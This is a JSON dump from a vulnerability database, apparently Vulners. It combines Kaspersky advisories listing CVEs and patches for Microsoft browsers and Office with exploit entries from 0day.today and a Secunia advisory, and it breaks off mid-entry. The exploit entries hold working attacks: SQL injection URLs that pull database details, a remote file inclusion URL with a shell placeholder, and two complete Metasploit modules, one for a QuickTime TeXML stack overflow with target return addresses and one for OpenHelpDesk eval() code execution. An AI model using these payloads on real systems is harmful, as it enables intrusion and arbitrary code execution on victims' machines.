"bulletinFamily": "info", "description": "### *Detect date*:\n11/13/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities were found in Microsoft Browsers. Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information, gain privileges, spoof user interface.\n\n### *Affected products*:\nMicrosoft Edge \nChakraCore \nInternet Explorer 11 \nInternet Explorer 9 \nInternet Explorer 10\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8588](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8588>) \n[CVE-2018-8557](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8557>) \n[CVE-2018-8545](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8545>) \n[CVE-2018-8542](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8542>) \n[CVE-2018-8556](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8556>) \n[CVE-2018-8543](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8543>) \n[CVE-2018-8567](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8567>) \n[CVE-2018-8564](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8564>) \n[CVE-2018-8541](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8541>) \n[CVE-2018-8552](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8552>) \n[CVE-2018-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8570>) \n[CVE-2018-8555](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8555>) \n[CVE-2018-8551](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8551>) \n\n\n### 
*Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2018-8588](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8588>)4.2Critical \n[CVE-2018-8557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8557>)4.2Critical \n[CVE-2018-8545](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8545>)4.3Critical \n[CVE-2018-8542](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8542>)4.2Critical \n[CVE-2018-8556](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8556>)4.2Critical \n[CVE-2018-8543](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8543>)4.2Critical \n[CVE-2018-8567](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8567>)5.4Critical \n[CVE-2018-8564](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8564>)4.3Critical \n[CVE-2018-8541](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8541>)4.2Critical \n[CVE-2018-8552](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8552>)4.3Critical \n[CVE-2018-8570](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8570>)7.5Critical \n[CVE-2018-8555](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8555>)4.2Critical \n[CVE-2018-8551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8551>)4.2Critical\n\n### *KB list*:\n[4467680](<http://support.microsoft.com/kb/4467680>) \n[4467708](<http://support.microsoft.com/kb/4467708>) \n[4467691](<http://support.microsoft.com/kb/4467691>) \n[4467702](<http://support.microsoft.com/kb/4467702>) \n[4467686](<http://support.microsoft.com/kb/4467686>) \n[4467696](<http://support.microsoft.com/kb/4467696>) \n[4467701](<http://support.microsoft.com/kb/4467701>) \n[4467697](<http://support.microsoft.com/kb/4467697>) \n[4467706](<http://support.microsoft.com/kb/4467706>) \n[4466536](<http://support.microsoft.com/kb/4466536>) 
\n[4467107](<http://support.microsoft.com/kb/4467107>)\n\n### *Microsoft official advisories*:", "modified": "2019-03-07T00:00:00", "published": "2018-11-13T00:00:00", "id": "KLA11353", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11353", "title": "\r KLA11353Multiple vulnerabilities in Microsoft Browser ", "type": "kaspersky", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-21T00:14:06", "bulletinFamily": "info", "description": "### *Detect date*:\n09/12/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Office. Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information and gain privileges.\n\n### *Affected products*:\nMicrosoft Office 2007 Service Pack 3 \nMicrosoft Office 2010 Service Pack 2 \nMicrosoft Office 2013 RT Service Pack 1 \nMicrosoft Office 2013 Service Pack 1 \nMicrosoft Office 2016 \nMicrosoft Office 2016 for Mac \nMicrosoft Office Compatibility Pack Service Pack 3 \nMicrosoft Office Web Apps 2010 Service Pack 2 \nMicrosoft Office Web Apps 2013 Service Pack 1 \nMicrosoft Office Web Apps Server 2013 Service Pack 1 \nMicrosoft Office Word Viewer \nMicrosoft Office for Mac 2011 \nMicrosoft Excel 2007 Service Pack 3 \nMicrosoft Excel 2010 Service Pack 2 \nMicrosoft Excel 2013 RT Service Pack 1 \nMicrosoft Excel 2013 Service Pack 1 \nMicrosoft Excel 2016 \nMicrosoft Excel 2016 for Mac \nMicrosoft Excel Viewer 2007 Service Pack 3 \nMicrosoft Excel Web App 2013 Service Pack 1 \nMicrosoft Excel for Mac 2011 \nMicrosoft Live Meeting 2007 Add-in \nMicrosoft Live Meeting 2007 Console \nMicrosoft Lync 2010 \nMicrosoft Lync 2010 Attendee \nMicrosoft Lync 2013 Service Pack 1 \nMicrosoft Lync Basic 2013 Service Pack 1 \nMicrosoft Outlook 2007 Service Pack 3 \nMicrosoft Outlook 2010 Service Pack 2 \nMicrosoft Outlook 2013 \nMicrosoft Outlook 2013 RT Service Pack 1 
\nMicrosoft Outlook 2016 \nMicrosoft PowerPoint 2007 Service Pack 3 \nMicrosoft PowerPoint 2010 Service Pack 2 \nMicrosoft PowerPoint 2013 RT Service Pack 1 \nMicrosoft PowerPoint 2013 Service Pack 1 \nMicrosoft PowerPoint 2016 \nMicrosoft PowerPoint Viewer 2007 \nMicrosoft Publisher 2007 Service Pack 3 \nMicrosoft Publisher 2010 Service Pack 2 \nMicrosoft SharePoint Enterprise Server 2016 \nMicrosoft SharePoint Foundation 2013 Service Pack 1 \nMicrosoft SharePoint Server 2013 Service Pack 1 \nOffice Online Server \nSkype for Business 2016 \nSkype for Business 2016 Basic\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[ADV170015](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170015>) \n[CVE-2017-8567](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8567>) \n[CVE-2017-8632](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8632>) \n[CVE-2017-8630](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8630>) \n[CVE-2017-8631](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8631>) \n[CVE-2017-8682](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8682>) \n[CVE-2017-8744](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8744>) \n[CVE-2017-8745](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8745>) \n[CVE-2017-8742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8742>) \n[CVE-2017-8695](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8695>) \n[CVE-2017-8696](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8696>) \n[CVE-2017-8629](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8629>) 
\n[CVE-2017-8725](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8725>) \n[CVE-2017-8676](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8676>) \n[CVE-2017-8743](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8743>) \n[CVE-2017-8676](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8676>) \n[CVE-2017-8682](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8682>) \n[CVE-2017-8695](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8695>) \n[CVE-2017-8696](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8696>) \n[CVE-2017-8745](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8745>) \n[CVE-2017-8744](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8744>) \n[CVE-2017-8743](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8743>) \n[CVE-2017-8742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8742>) \n[CVE-2017-8725](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8725>) \n[CVE-2017-8632](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8632>) \n[CVE-2017-8631](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8631>) \n[CVE-2017-8630](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8630>) \n[CVE-2017-8629](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8629>) \n[CVE-2017-8567](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8567>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Office Live Meeting 2007](<https://threats.kaspersky.com/en/product/Microsoft-Office-Live-Meeting-2007/>)\n\n### 
*CVE-IDS*:\n[CVE-2017-8676](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8676>)2.1Critical \n[CVE-2017-8682](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8682>)9.3Critical \n[CVE-2017-8695](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8695>)2.6Critical \n[CVE-2017-8696](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8696>)7.6Critical \n[CVE-2017-8745](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8745>)3.5Critical \n[CVE-2017-8744](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8744>)9.3Critical \n[CVE-2017-8743](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8743>)9.3Critical \n[CVE-2017-8742](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8742>)9.3Critical \n[CVE-2017-8725](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8725>)9.3Critical \n[CVE-2017-8632](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8632>)9.3Critical \n[CVE-2017-8631](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8631>)9.3Critical \n[CVE-2017-8630](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8630>)9.3Critical \n[CVE-2017-8629](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8629>)3.5Critical \n[CVE-2017-8567](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8567>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3213649](<http://support.microsoft.com/kb/3213649>) \n[3213644](<http://support.microsoft.com/kb/3213644>) \n[3213646](<http://support.microsoft.com/kb/3213646>) \n[3213641](<http://support.microsoft.com/kb/3213641>) \n[3213642](<http://support.microsoft.com/kb/3213642>) \n[3213560](<http://support.microsoft.com/kb/3213560>) \n[4025867](<http://support.microsoft.com/kb/4025867>) \n[3213562](<http://support.microsoft.com/kb/3213562>) \n[3213564](<http://support.microsoft.com/kb/3213564>) \n[3191831](<http://support.microsoft.com/kb/3191831>) \n[4011117](<http://support.microsoft.com/kb/4011117>) 
\n[3128030](<http://support.microsoft.com/kb/3128030>) \n[4025868](<http://support.microsoft.com/kb/4025868>) \n[3213631](<http://support.microsoft.com/kb/3213631>) \n[4025865](<http://support.microsoft.com/kb/4025865>) \n[4025866](<http://support.microsoft.com/kb/4025866>) \n[4011113](<http://support.microsoft.com/kb/4011113>) \n[3213638](<http://support.microsoft.com/kb/3213638>) \n[4011069](<http://support.microsoft.com/kb/4011069>) \n[3141537](<http://support.microsoft.com/kb/3141537>) \n[4011041](<http://support.microsoft.com/kb/4011041>) \n[4011040](<http://support.microsoft.com/kb/4011040>) \n[4011065](<http://support.microsoft.com/kb/4011065>) \n[4011064](<http://support.microsoft.com/kb/4011064>) \n[4011089](<http://support.microsoft.com/kb/4011089>) \n[4011062](<http://support.microsoft.com/kb/4011062>) \n[4011061](<http://support.microsoft.com/kb/4011061>) \n[4011134](<http://support.microsoft.com/kb/4011134>) \n[3213658](<http://support.microsoft.com/kb/3213658>) \n[3213626](<http://support.microsoft.com/kb/3213626>) \n[3203474](<http://support.microsoft.com/kb/3203474>) \n[3213551](<http://support.microsoft.com/kb/3213551>) \n[3212225](<http://support.microsoft.com/kb/3212225>) \n[4011056](<http://support.microsoft.com/kb/4011056>) \n[4011055](<http://support.microsoft.com/kb/4011055>) \n[4011050](<http://support.microsoft.com/kb/4011050>) \n[4011038](<http://support.microsoft.com/kb/4011038>) \n[4011063](<http://support.microsoft.com/kb/4011063>) \n[4011107](<http://support.microsoft.com/kb/4011107>) \n[3128027](<http://support.microsoft.com/kb/3128027>) \n[4025869](<http://support.microsoft.com/kb/4025869>) \n[4011090](<http://support.microsoft.com/kb/4011090>) \n[4011091](<http://support.microsoft.com/kb/4011091>) \n[3114428](<http://support.microsoft.com/kb/3114428>) \n[4011103](<http://support.microsoft.com/kb/4011103>) \n[4011126](<http://support.microsoft.com/kb/4011126>) \n[4011127](<http://support.microsoft.com/kb/4011127>) 
\n[3213632](<http://support.microsoft.com/kb/3213632>) \n[4011108](<http://support.microsoft.com/kb/4011108>) \n[4011125](<http://support.microsoft.com/kb/4011125>) \n[4011110](<http://support.microsoft.com/kb/4011110>)", "modified": "2019-03-07T00:00:00", "published": "2017-09-12T00:00:00", "id": "KLA11100", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11100", "title": "\r KLA11100Multiple vulnerabilities in Microsoft Office ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-11T05:28:20", "bulletinFamily": "exploit", "description": "Newssystem", "modified": "2012-12-22T00:00:00", "published": "2012-12-22T00:00:00", "id": "1337DAY-ID-20031", "href": "https://0day.today/exploit/description/20031", "type": "zdt", "title": "NEWSolved SQL Injection Vulnerability", "sourceData": "SQLi:\r\nhttp://127.0.0.1/newsscript.php?m=archive&topic_check=ok&idneu=-1' UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--'\r\n\r\nhttp://127.0.0.1/newsscript.php?mailto=ok&newsid=-1' UNION SELECT 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--'\r\n\r\nbSQLi:\r\nhttp://127.0.0.1/newsscript.php?comments=ok&snews_id=1' AND 1=1--'\r\n\r\nGreetz 2 fraggle\n\n# 0day.today [2018-01-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/20031"}, {"lastseen": "2018-04-14T15:47:31", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2012-06-28T00:00:00", "published": "2012-06-28T00:00:00", "id": "1337DAY-ID-18858", "href": "https://0day.today/exploit/description/18858", "type": "zdt", "title": "Apple QuickTime TeXML Stack Buffer Overflow", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::FILEFORMAT\r\n include Msf::Exploit::Remote::Seh\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apple QuickTime TeXML Stack Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Apple QuickTime. When handling\r\n a TeXML file, it is possible to trigger a stack-based buffer overflow, and then\r\n gain arbitrary code execution under the context of the user. The flaw is\r\n generally known as a bug while processing the 'transform' attribute, however,\r\n that attack vector seems to only cause a TerminateProcess call due to a corrupt\r\n stack cookie, and more data will only trigger a warning about the malformed XML\r\n file. This module exploits the 'color' value instead, which accomplishes the same\r\n thing.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alexander Gavrun', # Vulnerability Discovery\r\n 'sinn3r', # Metasploit Module\r\n 'juan vazquez' # Metasploit Module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'OSVDB', '81934' ],\r\n [ 'CVE', '2012-0663' ],\r\n [ 'BID', '53571' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-095/' ],\r\n [ 'URL', 'http://support.apple.com/kb/HT1222' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'BadChars' => \"\\x00\\x23\\x25\\x3c\\x3e\\x7d\"\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'QuickTime 7.7.1 on Windows XP SP3',\r\n {\r\n 'Ret' => 0x66f1bdf8, # POP ESI/POP EDI/RET from QuickTime.qts (7.71.80.42)\r\n 'Offset' => 643,\r\n 'Max' => 13508\r\n }\r\n ],\r\n [ 'QuickTime 7.7.0 on Windows XP SP3',\r\n {\r\n 'Ret' => 0x66F1BD66, # PPR from QuickTime.qts (7.70.80.34)\r\n 'Offset' => 643,\r\n 'Max' => 13508\r\n }\r\n ],\r\n [ 'QuickTime 7.6.9 
on Windows XP SP3',\r\n {\r\n 'Ret' => 0x66801042, # PPR from QuickTime.qts (7.69.80.9)\r\n 'Offset' => 643,\r\n 'Max' => 13508\r\n }\r\n ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'May 15 2012'))\r\n \r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.xml']),\r\n ], self.class)\r\n end\r\n \r\n def exploit\r\n my_payload = rand_text(target['Offset'])\r\n my_payload << generate_seh_record(target.ret)\r\n my_payload << payload.encoded\r\n my_payload << rand_text(target['Max'] - my_payload.length)\r\n \r\n texml = <<-eos\r\n <?xml version=\"1.0\"?>\r\n <?quicktime type=\"application/x-quicktime-texml\"?>\r\n \r\n <text3GTrack trackWidth=\"176.0\" trackHeight=\"60.0\" layer=\"1\"\r\n language=\"eng\" timeScale=\"600\"\r\n transform=\"matrix(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1, 0, 1.0)\">\r\n <sample duration=\"2400\" keyframe=\"true\">\r\n \r\n <description format=\"tx3g\" displayFlags=\"ScrollIn\"\r\n horizontalJustification=\"Left\"\r\n verticalJustification=\"Top\"\r\n backgroundColor=\"0%, 0%, 0%, 100%\">\r\n \r\n <defaultTextBox x=\"0\" y=\"0\" width=\"176\" height=\"60\"/>\r\n <fontTable>\r\n <font id=\"1\" name=\"Times\"/>\r\n </fontTable>\r\n \r\n <sharedStyles>\r\n <style id=\"1\">\r\n {font-table: 1} {font-size: 10}\r\n {font-style:normal}\r\n {font-weight: normal}\r\n {color: #{my_payload}%, 100%, 100%, 100%}\r\n </style>\r\n </sharedStyles>\r\n </description>\r\n \r\n <sampleData scrollDelay=\"200\"\r\n highlightColor=\"25%, 45%, 65%, 100%\"\r\n targetEncoding=\"utf8\">\r\n \r\n <textBox x=\"10\" y=\"10\" width=\"156\" height=\"40\"/>\r\n <text styleID=\"1\">What you need... 
Metasploit!</text>\r\n <highlight startMarker=\"1\" endMarker=\"2\"/>\r\n <blink startMarker=\"3\" endMarker=\"4\"/>\r\n </sampleData>\r\n </sample>\r\n </text3GTrack>\r\n eos\r\n \r\n texml = texml.gsub(/^\\t\\t/,'')\r\n \r\n print_status(\"Creating '#{datastore['FILENAME']}'.\")\r\n file_create(texml)\r\n end\r\n \r\nend\r\n\r\n\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18858"}, {"lastseen": "2018-02-06T03:19:22", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-04-12T00:00:00", "published": "2010-04-12T00:00:00", "id": "1337DAY-ID-11735", "href": "https://0day.today/exploit/description/11735", "type": "zdt", "title": "YaPig v0.94.0u Remote File Inclusion Vulnerability", "sourceData": "==================================================\r\nYaPig v0.94.0u Remote File Inclusion Vulnerability\r\n==================================================\r\n\r\n |=-----------------------------------------------------=|\r\n |=-------------=[ JIKO |No-exploit.Com| ]=-----------=|\r\n |=-----------------------------------------------------=|\r\n[~]-----------|00|\r\nNAme :JIKO (JAWAD)\r\nHome :No-exploit.Com\r\nMail : !x!\r\n[~]-----------|01|\r\n -{Script}\r\n name :YaPig V0.94.0u\r\n link :http://yapig.sourceforge.net/\r\n \r\n[~]-----------|02|\r\n -{3xpl01t}\r\n http://no-exploit.com/last_gallery.php?YAPIG_PATH={Shell}\r\n[~]-----------|03|\r\n -{Greetz}\r\n Cyber-Zone,HxH,Hussin X,ZaIdOoHxHaCkEr ,Stack,HiSoKa,The SadHacker,SkuLL-HacKeR ,Dr.NaNo\r\n |No-Exploit.com Members\r\n-------------------------------------\r\n\r\n\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/11735"}, {"lastseen": "2018-04-09T16:53:45", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-02-02T00:00:00", "published": 
"2009-02-02T00:00:00", "id": "1337DAY-ID-4776", "href": "https://0day.today/exploit/description/4776", "type": "zdt", "title": "OpenHelpDesk 1.0.100 eval() Code Execution Exploit (meta)", "sourceData": "=========================================================\r\nOpenHelpDesk 1.0.100 eval() Code Execution Exploit (meta)\r\n=========================================================\r\n\r\n\r\n##\r\n# $Id: php_eval.rb 5783 2008-10-23 02:43:21Z ramon $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/projects/Framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'OpenHelpDesk eval (previously unpublished)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tOpenHelpDesk version 1.0.100 is vulnerable to a php code\r\n\t\t\t\texecution vulnerability due to improper use of eval().\r\n\t\t\t\tThe php.ini register_globals directive is *not* required to be\r\n\t\t\t\ton to exploit this vulnerability. 
There is no known public\r\n\t\t\t\texploit for this vulnerability.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'LSO <[email\u00a0protected]>' ],\r\n\t\t\t'License' => BSD_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' => [ 'URL' , 'http://sourceforge.net/projects/openhelpdesk' ],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP,\r\n\t\t\t'Payload' => \r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 4000, # max url length for some old\r\n\t\t\t\t\t\t\t\t\t\t\t# versions of apache according to\r\n\t\t\t\t\t\t\t\t\t\t\t# http://www.boutell.com/newfaq/misc/urllength.html\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'BadChars' => %q|'\"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install\r\n\t\t\t\t\t'Compat' => \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'ConnectionType' => 'find',\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t'Keys' => ['php'],\r\n\t\t\t\t},\r\n\t\t\t'Targets' => [ ['Automatic', { }], ],\r\n\t\t\t'DefaultTarget' => 0\r\n\t\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('URIPATH', [ true, \"The URI of ajax.php \", '/openhelpdesk/ajax.php']),\r\n\t\t\t], self.class)\r\n\t\r\n\tend\r\n\r\n\tdef check\r\n\t\ttester = rand_text_alpha(10)\r\n\t\tphp_code = \"echo('#{tester}');\"\r\n\r\n\t\tresponse = eval_sploit(php_code)\r\n\r\n\t\t#print_status(response)\r\n\t\tif (response && response.body.match(tester).to_a.first)\r\n\t\t\tprint_status(\"PHP code execution achieved; safe_mode or disable_functions might still prevent host compromise\")\r\n\t\t\tcheckcode = Exploit::CheckCode::Vulnerable\r\n\t\telse\r\n\t\t\tcheckcode = Exploit::CheckCode::Safe\r\n\t\tend\r\n\t\treturn checkcode\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tresponse = eval_sploit(payload.encoded)\r\n\r\n\t\thandler\r\n\tend\r\n\r\n\tdef eval_sploit(php_code)\r\n\t\turi = datastore['URIPATH'] + \"?function=\" + php_code + \"//\"\r\n\t\tresponse = send_request_raw({ 'uri' => uri },1)\r\n\t\treturn response\r\n\tend\r\nend\r\n\r\n\r\n\n# 
0day.today [2018-04-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4776"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nAkarru Social BookMarking Engine SQL Injection Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA19112\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/19112/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nManipulation of data\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nAkarru Social BookMarking Engine 0.x\r\nhttp://secunia.com/product/8567/\r\n\r\nDESCRIPTION:\r\nA vulnerability has been reported in Akarru Social BookMarking\r\nEngine, which can be exploited by malicious people to conduct SQL\r\ninjection attacks.\r\n\r\nInput passed to the user name in users.php isn't properly sanitised\r\nbefore being used in a SQL query. This can be exploited to manipulate\r\nSQL queries by injecting arbitrary SQL code.\r\n\r\nThe vulnerability has been reported in versions prior to 0.4.3.4.\r\n\r\nSOLUTION:\r\nUpdate to version 0.4.3.4.\r\nhttp://sourceforge.net/project/showfiles.php?group_id=155783\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nThe vendor credits Ricardo Galli.\r\n\r\nORIGINAL ADVISORY:\r\nhttp://sourceforge.net/project/shownotes.php?release_id=398713&group_id=155783\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse 
those supplied by the vendor.\r\n", "modified": "2006-03-08T00:00:00", "published": "2006-03-08T00:00:00", "id": "SECURITYVULNS:DOC:11735", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11735", "title": "[SA19112] Akarru Social BookMarking Engine SQL Injection Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:12", "bulletinFamily": "software", "description": "\r\n----------------------------------------------------------------------\r\n\r\nWant a new IT Security job?\r\n\r\nVacant positions at Secunia:\r\nhttp://secunia.com/secunia_vacancies/\r\n\r\n----------------------------------------------------------------------\r\n\r\nTITLE:\r\nFreeBSD Kernel Memory Disclosure Vulnerabilities\r\n\r\nSECUNIA ADVISORY ID:\r\nSA15262\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/15262/\r\n\r\nCRITICAL:\r\nLess critical\r\n\r\nIMPACT:\r\nExposure of sensitive information\r\n\r\nWHERE:\r\nLocal system\r\n\r\nOPERATING SYSTEM:\r\nFreeBSD 5.x\r\nhttp://secunia.com/product/1132/\r\nFreeBSD 